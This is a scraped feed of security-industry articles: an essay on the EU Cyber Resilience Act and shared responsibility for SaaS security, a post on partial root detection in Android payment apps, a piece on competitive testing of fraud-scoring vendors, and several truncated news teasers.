Technology

<p><span data-contrast="auto">The European Union’s Cyber Resilience Act (CRA) has captured global attention because of the </span><span data-contrast="auto">new approach it brings to regulating software and connected products</span><span data-contrast="auto">. The CRA doesn’t stop at compliance checkboxes. It introduces four principles that reshape how vendors must think about security: Products should launch without known vulnerabilities, security must be built in from the design phase, vulnerabilities must be managed across the entire lifecycle, and vendors must be prepared to deliver rapid updates when issues arise. The common thread is clear. <a href="https://securityboulevard.com/2025/11/rethinking-cyber-resilience-in-the-age-of-ai/" target="_blank" rel="noopener">Resilience needs to be embedded from the start</a> rather than bolted on after incidents.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><span data-contrast="auto">Though born in Europe, the CRA’s influence will eventually spread far beyond EU borders. Global vendors cannot realistically maintain different development and security standards across markets. Like General Data Protection Regulation (GDPR) before it, the CRA will shape how products are built, shipped, and maintained worldwide. U.S. companies should pay close attention, not only because they may fall under its scope, but also because domestic regulators are moving in the same direction. The SEC’s new disclosure rules, the FTC’s scrutiny of negligent practices, and the growing number of state-level data protection laws all point to a world where resilience isn’t a “nice to have.”</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><h3><b><span data-contrast="auto">SaaS as the CRA’s Proving Ground</span></b><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></h3><p><span data-contrast="auto">Software-as-a-service (SaaS) is one of the most overlooked proving grounds for CRA principles. SaaS applications are now the backbone of modern organizations, from sales and finance to HR and engineering. They are also a prime target for attackers, precisely because they sit at the intersection of sensitive data, federated identity and complex integrations.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><span data-contrast="auto">The recent </span><a href="https://www.bleepingcomputer.com/news/security/salesloft-march-github-repo-breach-led-to-salesforce-data-theft-attacks/" target="_blank" rel="noopener"><span data-contrast="none">Salesloft breach</span></a><span data-contrast="auto"> shows why CRA-style requirements matter here. In March, attackers </span><a href="https://trust.salesloft.com/?uid=Update+on+Mandiant+Drift+and+Salesloft+Application+Investigations" target="_blank" rel="noopener"><span data-contrast="none">compromised a GitHub workflow</span></a><span data-contrast="auto">, stole OAuth tokens, and leveraged them to access Salesforce environments connected to Salesloft. This was not a traditional exploit of unpatched software, but it did involve weaknesses in the vendor’s security practices. Stronger controls, rapid patching, immediate reporting and more secure development pipelines – the exact requirements envisioned by the CRA – would have reduced the likelihood and impact of such an incident.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><span data-contrast="auto">In this sense, CRA provides a useful framework for SaaS vendors. “No known vulnerabilities” at launch, a continuous vulnerability management process and lifecycle security obligations – together set a baseline for responsible SaaS development.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><h3><b><span data-contrast="auto">Why Compliance Alone Won’t Stop the Next Breach</span></b><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></h3><p><span data-contrast="auto">But this is only half the story. Even the most diligent vendor can ship a service that is technically free of known vulnerabilities, and customers may still find themselves compromised. Some of the most dangerous attacks don’t exploit software flaws. They exploit people.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><span data-contrast="auto">The wave of vishing campaigns targeting </span><a href="https://www.mitiga.io/blog/how-threat-actors-used-salesforce-data-loader-for-covert-api-exfiltration" target="_blank" rel="noopener"><span data-contrast="none">Salesforce customers</span></a><span data-contrast="auto"> shows this clearly. Groups like ShinyHunters convinced employees to hand over valid Salesforce credentials through phone and voice phishing schemes. With real logins in hand, attackers moved laterally, accessed sensitive records and exfiltrated data. No unpatched vulnerability was needed.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><b><span data-contrast="auto">Attackers don’t break in. They log in.</span></b><span data-contrast="auto"> When valid credentials or tokens are abused, the principle of lifecycle security and even strong vulnerability handling are not enough. Prevention-focused approaches are bypassed entirely, underscoring the need for resilient defenses.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><h3><b><span data-contrast="auto">Shared Responsibility is the Only Way Forward</span></b><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></h3><p><span data-contrast="auto">This brings us to the heart of the matter: SaaS security is inherently a shared responsibility. The CRA rightfully raises the bar for vendors, demanding secure-by-design practices, vulnerability handling and timely updates. But customers cannot outsource all accountability.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><span data-contrast="auto">Vendors must:</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="3" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">Harden their code, pipelines and integrations.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="3" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">Provide rapid updates and transparency when vulnerabilities are found. </span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="3" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">Build in protections against unauthorized access.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="3" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">Report exploited vulnerabilities or incidents quickly to the authorities.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><p><span data-contrast="auto">Customers must:</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">Monitor how identities are used across SaaS applications.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">Detect and respond to suspicious logins, anomalous activity, or unauthorized integrations.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">Educate employees to resist social engineering and phishing campaigns.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">Integrate SaaS events into detection and response workflows.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></li></ul><p><span data-contrast="auto">Resilience in SaaS comes not from compliance checkboxes, but from this balance. Vendors secure the foundation, and customers build vigilance on top of it. Both sides must act.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><h3><b><span data-contrast="auto">A Preview of What’s Coming</span></b><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></h3><p><span data-contrast="auto">The CRA points the way for global regulation: Resilience, accountability and lifecycle security. U.S. regulators may not choose to adopt the exact same framework, but the principles are already visible in SEC disclosure mandates and FTC enforcement. For companies operating in the U.S., the safest path is to prepare as if CRA-style rules are inevitable.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><span data-contrast="auto">Organizations must do both: Hold vendors accountable and build detection and response capabilities for when attackers inevitably log in. Organizations that treat resilience as a partnership – vendors building secure platforms, customers monitoring identity and activity – will be far better positioned than those who view compliance as a finish line.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><h3><b><span data-contrast="auto">Resilience Demands Shared Responsibility</span></b><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></h3><p><span data-contrast="auto">The Cyber Resilience Act is a step forward for software security, and SaaS vendors should embrace its principles. But it would be a mistake to assume that compliance alone will deliver resilience. As the Salesloft breach shows, vendor practices matter. As the Salesforce vishing campaigns show, so does customer vigilance.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><p><span data-contrast="auto">Attackers in the SaaS era exploit both technology and people. They don’t break in. They log in. The only way forward is shared responsibility. Vendors and customers must accept that resilience is a joint mission. Those who act on that understanding will not only stay ahead of regulators but will also be ready for the next wave of attacks.</span><span data-ccp-props='{"134233117":true,"134233118":true,"201341983":0,"335559740":240}'> </span></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/the-cyber-resilience-act-and-saas-why-compliance-is-only-half-the-battle/" data-a2a-title="The Cyber Resilience Act and SaaS: Why Compliance is Only Half the Battle "><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-cyber-resilience-act-and-saas-why-compliance-is-only-half-the-battle%2F&amp;linkname=The%20Cyber%20Resilience%20Act%20and%20SaaS%3A%20Why%20Compliance%20is%20Only%20Half%20the%20Battle%C2%A0" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-cyber-resilience-act-and-saas-why-compliance-is-only-half-the-battle%2F&amp;linkname=The%20Cyber%20Resilience%20Act%20and%20SaaS%3A%20Why%20Compliance%20is%20Only%20Half%20the%20Battle%C2%A0" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-cyber-resilience-act-and-saas-why-compliance-is-only-half-the-battle%2F&amp;linkname=The%20Cyber%20Resilience%20Act%20and%20SaaS%3A%20Why%20Compliance%20is%20Only%20Half%20the%20Battle%C2%A0" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-cyber-resilience-act-and-saas-why-compliance-is-only-half-the-battle%2F&amp;linkname=The%20Cyber%20Resilience%20Act%20and%20SaaS%3A%20Why%20Compliance%20is%20Only%20Half%20the%20Battle%C2%A0" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-cyber-resilience-act-and-saas-why-compliance-is-only-half-the-battle%2F&amp;linkname=The%20Cyber%20Resilience%20Act%20and%20SaaS%3A%20Why%20Compliance%20is%20Only%20Half%20the%20Battle%C2%A0" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

Interviewer: Jillian York Laura Vidal is a Venezuelan researcher and writer focused on digital rights, community resilience, and the informal ways people learn and resist under authoritarian pressur… [+31364 chars]

I used to walk past a nondescript grey office building at the intersection of 2nd and Folsom in San Francisco. Its the kind of corporate architecture that litters every city but nobody really loves: … [+16365 chars]

UK-based SCI Semiconductors has expressed interest in establishing a Global Capability Centre (GCC) in Karnataka. This move is expected to pave the way for the local manufacture of hardware-secured m… [+2434 chars]

UK-based SCI Semiconductors has expressed interest in establishing a Global Capability Centre (GCC) in Karnataka. This move is expected to pave the way for the local manufacture of hardware-secured m… [+2434 chars]

For much of the world, technology has become so intertwined with our day-to-day lives that it influences everything. Our relationships, the care we seek, how we work, what we do to protect ourselves,… [+26045 chars]

For most people,Black Friday means one thing: deep discounts on products and services they’ve been eyeing all year. The VPN market is no different, with a flood of Black Friday VPN deals promising e… [+2801 chars]

[Lydia Millar is a PhD candidate at Queen’s University Belfast and manager of the Digital Investigation Lab at the School of Law. Filipe Castillejo Gaitán is a Colombian Human Rights and OSINT Resea… [+13422 chars]

As major data breaches, cyberattacks, and ever-more invasive data collection continue to plague our digital life, more people have been turning to the best VPN apps to take back some agency over thei… [+3010 chars]

<p><span style="font-weight: 400;">Among the most debated questions in the constantly changing mobile application development, whether to include root detection in the application is a seemingly important choice to both developers and security teams. This is not just a technical option, but it has far-reaching consequences in terms of user experience, security, and compliance.</span></p><p><span style="font-weight: 400;">On the one hand, root detection can ensure that a compromised device is not used to execute sensitive data and operations. Conversely, bad implementation would cause users to be chased away or end up bypassing the implementation, making the whole exercise useless. This problem is further complicated by considering the compliance requirements, risks unique to the industry, and a variety of user demographics.</span></p><h3><b>Compliance: A Key Factor in the Debate</b></h3><p><span style="font-weight: 400;">Applications that deal with sensitive data tend to impose strict security controls on applications in industries such as finance, healthcare, and e-commerce as compliance schemes. For instance:</span></p><ul> <li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Payments application </span><b>PCI DSS</b><span style="font-weight: 400;"> suggests keeping sensitive data out of the hands of unauthorized users, as rooted devices can penetrate.</span></li> <li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">To ensure that healthcare apps are </span><b>HIPAA</b><span style="font-weight: 400;"> compliant, effective measures are required to ensure that patient information is not breached.</span></li> <li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Vulnerabilities in rooted devices are a possible compliance threat because </span><b>GDPR </b><span style="font-weight: 400;">focuses on the security of personal data.</span></li> <li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The enabled root detection also contributes to the security and enables the organization to enable UPI on its platform, which is in line with the RBI and NPCI recommendations.</span></li> </ul><p><span style="font-weight: 400;">Although compliance does not necessarily imply the explicit requirement to detect the root, it implies the provision of privacy, integrity, and availability of the data, which is not easily achieved without considering the risks of rooted machines.</span></p><h3><b>Who Should Implement Root Detection?</b></h3><p><b>Organizations that should prioritize root detection:</b></p><ol> <li style="font-weight: 400;" aria-level="1"><b>Financial Apps</b><span style="font-weight: 400;">: Banks, wallets, and payment apps are the best targets of fraud and data theft.</span></li> <li style="font-weight: 400;" aria-level="1"><b>Healthcare Apps</b><span style="font-weight: 400;">: Concerns: It is very important to safeguard sensitive patient data in regulations such as HIPAA.</span></li> <li style="font-weight: 400;" aria-level="1"><b>Corporate Apps</b><span style="font-weight: 400;">: Enterprise applications with access to proprietary or sensitive organizational data.</span></li> <li style="font-weight: 400;" aria-level="1"><b>Gaming Apps with Microtransactions</b><span style="font-weight: 400;">: To prevent tampering and fraudulent purchases.</span></li> <li><b>E-Commerce Apps</b><span style="font-weight: 400;">: Processing payment-related information and user-sensitive data.</span></li> </ol><h3><b>Who Might Forego Root Detection?</b></h3><p><span style="font-weight: 400;">While root detection can benefit most apps, there are cases where it might not be necessary:</span></p><ol> <li style="font-weight: 400;" aria-level="1"><b>Apps with Low Security Requirements</b><span style="font-weight: 400;">: For instance, casual games or apps that don’t process sensitive data.</span></li> <li style="font-weight: 400;" aria-level="1"><b>Apps Targeting Developers</b><span style="font-weight: 400;">: Developer-focused apps often require access to advanced features that may conflict with root detection.</span></li> <li><b>Open-Source or Customizable Apps</b><span style="font-weight: 400;">: Apps designed to be modified or extended by users may not prioritize root restrictions.</span></li> </ol><h3><b>Pros of Implementing Root Detection</b></h3><table> <tbody> <tr> <td><b>Advantages</b></td> <td><b>Description</b></td> </tr> <tr> <td><b>Enhanced Security</b></td> <td><span style="font-weight: 400;">Protects sensitive data and app functionality from malicious tampering.</span></td> </tr> <tr> <td><b>Compliance Readiness</b></td> <td><span style="font-weight: 400;">Helps align with security requirements in regulated industries like finance and healthcare.</span></td> </tr> <tr> <td><b>Fraud Prevention</b></td> <td><span style="font-weight: 400;">Deters financial fraud, credential theft, and API abuse by reducing attacker capabilities.</span></td> </tr> <tr> <td><b>User Trust</b></td> <td><span style="font-weight: 400;">Reinforces confidence in the app’s security for end-users.</span></td> </tr> </tbody> </table><h3><b>Cons of Implementing Root Detection</b></h3><table> <tbody> <tr> <td><b>Disadvantages</b></td> <td><b>Description</b></td> </tr> <tr> <td><b>User Experience Impact</b></td> <td><span style="font-weight: 400;">Legitimate users on rooted devices may face app restrictions or an inability to use the app.</span></td> </tr> <tr> <td><b>Bypass Risk</b></td> <td><span style="font-weight: 400;">Advanced attackers can circumvent poorly implemented root detection.</span></td> </tr> <tr> <td><b>Development Overhead</b></td> <td><span style="font-weight: 400;">Adds complexity to app development and maintenance.</span></td> </tr> <tr> <td><b>Potential Market Exclusion</b></td> <td><span style="font-weight: 400;">Could exclude users in markets where rooting is common for device customization.</span></td> </tr> </tbody> </table><h3><b>Risks of not Implementing Root Detection (Potential)</b></h3><h3><b><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-13527" src="https://strobes.co/wp-content/uploads/2025/11/Risks-of-not-Implementing-Root-Detection-Potential.jpg" alt="Table showing risks of missing Root Detection, including malware exposure, tampering, credential theft, API abuse, data loss, fraud, compliance issues, and service disruption." width="1698" height="2560" srcset="https://strobes.co/wp-content/uploads/2025/11/Risks-of-not-Implementing-Root-Detection-Potential.jpg 1698w, https://strobes.co/wp-content/uploads/2025/11/Risks-of-not-Implementing-Root-Detection-Potential-199x300.jpg 199w, https://strobes.co/wp-content/uploads/2025/11/Risks-of-not-Implementing-Root-Detection-Potential-679x1024.jpg 679w, https://strobes.co/wp-content/uploads/2025/11/Risks-of-not-Implementing-Root-Detection-Potential-768x1158.jpg 768w, https://strobes.co/wp-content/uploads/2025/11/Risks-of-not-Implementing-Root-Detection-Potential-1019x1536.jpg 1019w, https://strobes.co/wp-content/uploads/2025/11/Risks-of-not-Implementing-Root-Detection-Potential-1358x2048.jpg 1358w" sizes="(max-width: 1698px) 100vw, 1698px">Optional Partial Implementation of Root Detection: A UPI Case Study</b></h3><p><span style="font-weight: 400;">Although root detection on a system-wide basis, as implemented in an application that is UPI-based, could lead to increased security, it can equally pose a usability problem to legitimate users of the rooted device, like those who use the same to customize or develop applications. A particular implementation plan can be a trade-off, where the essential elements of payments are preserved, but the functionality of non-sensitive parts of the application is not lost.</span></p><h3><b>How Partial Root Detection Works in UPI Apps</b></h3><ol> <li style="font-weight: 400;" aria-level="1"><b>Sensitive Modules containing root detection.</b> <ul> <li style="font-weight: 400;" aria-level="2"><b>Payment Authorization: </b><span style="font-weight: 400;">Prevent the occurrence of fraudulent activities through the detection of root status prior to the initiation and authorization of a transaction.</span></li> <li style="font-weight: 400;" aria-level="2"><b>Data Encryption and Storage: </b><span style="font-weight: 400;">Make sure that the sensitive user information, including the details of the bank accounts and UPI PINs, is not visible on rooted devices.</span></li> <li style="font-weight: 400;" aria-level="2"><b>API Requests to Payment Gateways</b><span style="font-weight: 400;">: Protect API calls involved in transaction validation to prevent tampering or replay attacks.</span></li> </ul> </li> <li style="font-weight: 400;" aria-level="1"><b>Non-Sensitive Modules Without Root Detection</b> <ul> <li style="font-weight: 400;" aria-level="2"><b>User Interface Features: </b><span style="font-weight: 400;">The features of the application where the UPI is not enabled or it is not mandatory that the user should access these features.</span></li> <li style="font-weight: 400;" aria-level="2"><b>General Information Access</b>: Allow users to browse tutorials, FAQs, or promotional content without triggering root-related restrictions.</li> </ul> </li> </ol><p><span style="font-weight: 400;">Root detection partial implementation would be a realistic method of balancing security and user experience in the UPI context. By taking control over the fact that high-risk modules such as payment authorization and sensitive data may be compromised without interfering in the lower-risk areas, UPI apps can potentially prevent fraud in rooted devices without disrupting the accessibility of their services to a wider user base. This practice is in line with regulatory requirements by authorities such as the Reserve Bank of India (RBI), and it makes UPI systems reliable.</span></p><h3><b>Conclusion:</b></h3><p><span style="font-weight: 400;">Root detection is an essential measure that can be deployed to protect sensitive information and avoid fraud, particularly in applications that involve financial transactions, health care, or corporate information. Its use within the entire app may, however, affect user experience, especially when it has been applied to rooted devices.</span></p><p><span style="font-weight: 400;">The balance is found in a partial implementation plan that involves the application of root detection to important modules, such as payment processing, and leaving non-sensitive ones free to all. This can be used to increase security without affecting usability, and it is therefore suited to the apps that are required to pass the regulations and secure high-risk zones, as is the case with UPI apps in India.</span></p><p><span style="font-weight: 400;">Finally, this will depend on the purpose of the app, the intended audience, and regulations. Thoughtfully implemented root detection helps maintain both security and user experience.</span></p><p>The post <a rel="nofollow" href="https://strobes.co/blog/root-detection-android-security/">Root Detection in Android Apps – Security Benefits, Challenges, and Implementation Strategies</a> appeared first on <a rel="nofollow" href="https://strobes.co/">Strobes Security</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/root-detection-in-android-apps-security-benefits-challenges-and-implementation-strategies/" data-a2a-title="Root Detection in Android Apps – Security Benefits, Challenges, and Implementation Strategies"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Froot-detection-in-android-apps-security-benefits-challenges-and-implementation-strategies%2F&amp;linkname=Root%20Detection%20in%20Android%20Apps%20%E2%80%93%20Security%20Benefits%2C%20Challenges%2C%20and%20Implementation%20Strategies" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Froot-detection-in-android-apps-security-benefits-challenges-and-implementation-strategies%2F&amp;linkname=Root%20Detection%20in%20Android%20Apps%20%E2%80%93%20Security%20Benefits%2C%20Challenges%2C%20and%20Implementation%20Strategies" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Froot-detection-in-android-apps-security-benefits-challenges-and-implementation-strategies%2F&amp;linkname=Root%20Detection%20in%20Android%20Apps%20%E2%80%93%20Security%20Benefits%2C%20Challenges%2C%20and%20Implementation%20Strategies" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Froot-detection-in-android-apps-security-benefits-challenges-and-implementation-strategies%2F&amp;linkname=Root%20Detection%20in%20Android%20Apps%20%E2%80%93%20Security%20Benefits%2C%20Challenges%2C%20and%20Implementation%20Strategies" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Froot-detection-in-android-apps-security-benefits-challenges-and-implementation-strategies%2F&amp;linkname=Root%20Detection%20in%20Android%20Apps%20%E2%80%93%20Security%20Benefits%2C%20Challenges%2C%20and%20Implementation%20Strategies" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://strobes.co">Strobes Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Shiva Krishna Samireddy">Shiva Krishna Samireddy</a>. Read the original post at: <a href="https://strobes.co/blog/root-detection-android-security/">https://strobes.co/blog/root-detection-android-security/</a> </p>

<p>Competitive testing is a business-critical function for financial institutions seeking the ideal solutions provider to help optimize their risk management strategies. Don’t get seduced by inflated test results or flowery marketing claims, however.</p><p>Selecting the right risk solutions could be one of the most important tasks your business ever undertakes – and one of the costliest if it goes wrong. For the best chance of success, competitive testing grounded in scientific analysis is vital.</p><h3><strong>What is Competitive Testing?</strong></h3><p>Competitive testing is a careful evaluation of prospective solutions’ performance uninfluenced by dubious promises and conducted thoughtfully, in a way that enables fair comparisons with current system outputs and real-world outcomes.</p><p>It’s easy to overlook the true motivations of the solutions providers pitching for your business. Some are great at winning business – and will make a big song and dance about it – but the true value of competitive testing lies in establishing a meaningful and lasting partnership, as many of our returning clients will attest.</p><p>Here I’ve outlined several key insights based on extensive experience with similar processes in the hope that it helps others to build an optimal approach and perhaps goes some way to establishing an industry standard practice for this important process.</p><h3><strong>Key Insight #1: Avoid Only Looking at High-Level Metrics Without Context</strong></h3><p>In competitive testing, risk managers should use specific key performance indicators (KPIs) closely aligned with their business needs, not generic metrics like Kolmogorov-Smirnov Statistics (KS). High-level metrics like KS often require contextual interpretation to avoid suboptimal decisions. A higher KS score might indicate better differentiation between good and bad populations, but its significance depends on the operating range of the business, which in turn depends on the nature of the business.</p><p>For example, subprime lenders operate at different parameters to near-prime lenders who operate at different parameters to prime lenders. Fraud-related KPIs tend to be focused in the riskiest tail and depend on the specific fraud typology fraudsters use. Ultimately, testing requires tailoring measurements to operational contexts, being sure to inform decisions with relevant, actionable insights.</p><h3><strong>Key Insight #2:  Don’t Review Scores in Isolation to Existing Strategy</strong></h3><p>Assess results beyond face value instead of simply prioritizing the highest-ranking predictive scores. Consider the broader context, including the <em>net benefit</em> and <em>incremental lift</em> a solution may provide over existing strategies.</p><p>For example:</p><ul> <li><strong>Lift Over Legacy: </strong>Always measure a prospective solution’s benefit in comparison to the existing decision strategy (referred to as “lift”). A solution that integrates complementary, non-correlated data with current systems may provide greater incremental value than one with the highest KPIs.</li> <li><strong>Avoid Redundant Data</strong>: Adding too much of the same type of information results in diminishing returns. Incorporate a mix of highly varied data sources like credit bureau data, alternative data, device information, email data, behavioral data and/or biometric data to create a holistic and multi-dimensional risk assessment. Multiple uncorrelated signals enrich predictive power, reduce risks and improve fraud detection.</li> </ul><h3><strong>Key Insight #3: Don’t Use a Ruler to Measure Wind Speed</strong></h3><p>It’s crucial for risk managers to align performance metrics with the specific problem they aim to address when testing and implementing scoring algorithms. Using a score calibrated for third-party fraud to tackle first-party fraud will yield suboptimal results, as the frauds differ significantly in their typologies.</p><p>Equally, specific fraud categories demand distinct performance definitions. A mismatch between a score’s calibration and a lender’s business metrics can lead to ineffective decisions. In that sense, the best-performing scoring models are not necessarily the ones with the most “accurate” definitions but those that are calibrated to align with your organization’s specific fraud problems and operational metrics. Misaligned definitions negatively impact outcomes for all parties, underscoring the importance of tailoring fraud analytics to meet individual performance needs.</p><h3><strong>Key Insight #4: Avoid the Risk of Overfitting</strong></h3><p>When testing competitor products, it’s crucial to avoid the pitfall of overfitting, where providers may intentionally or unintentionally manipulate algorithms to achieve high performance metrics on test samples, at the cost of long-term efficacy. Overfitted models often degrade quickly when applied to broader populations, leading to suboptimal results.</p><p>The most accurate and sustainable scoring models use a three-sample test:</p><ol> <li><strong>Development Sample:</strong> Share performance data with the solutions provider to optimize scoring algorithms.</li> <li><strong>Validation Sample:</strong> Provide an out-of-time sample from a different period to test the score’s robustness.</li> <li><strong>Independent Sample:</strong> Request scoring on a final sample without performance data to confirm validation across independent data sets.</li> </ol><p>This structured process minimizes risks and overfitting, and ensures high-performing, predictive scores tailored to the institution’s applicant base. Sharing performance data also enables prospective solution providers to fully leverage their expertise to deliver solutions aligned with the client’s unique needs.</p><h3><strong>Key Insight #5:  Beware of Truncation Bias</strong></h3><p>Truncation bias refers to the development sample not accurately reflecting the broader “through the door” population. Most samples are based on legacy products and strategies, resulting in a skewed outcome during head-to-head testing because the sample was shaped by the legacy solution. This bias often places the legacy score at a disadvantage because it has already filtered outcomes, giving the challenger score an artificial advantage. The challenger score need only find a few additional red flags in the booked population to look like the stronger score. This is an unbalanced conclusion insofar as the legacy score doesn’t have the opportunity to add insight to a challenger score.</p><p>To mitigate truncation bias, adopt champion-challenger testing methods on the full population of applicants rather than solely on a booked sample. This approach ensures a more accurate assessment of both legacy and challenger solutions by reflecting their true potential impact on decision making.</p><p><a href="https://securityboulevard.com/wp-content/uploads/2025/11/Screen-Shot-2025-11-24-at-12.29.55-PM.png"><img fetchpriority="high" decoding="async" class="wp-image-2077127 alignleft" src="https://securityboulevard.com/wp-content/uploads/2025/11/Screen-Shot-2025-11-24-at-12.29.55-PM-284x300.png" alt="" width="391" height="413" 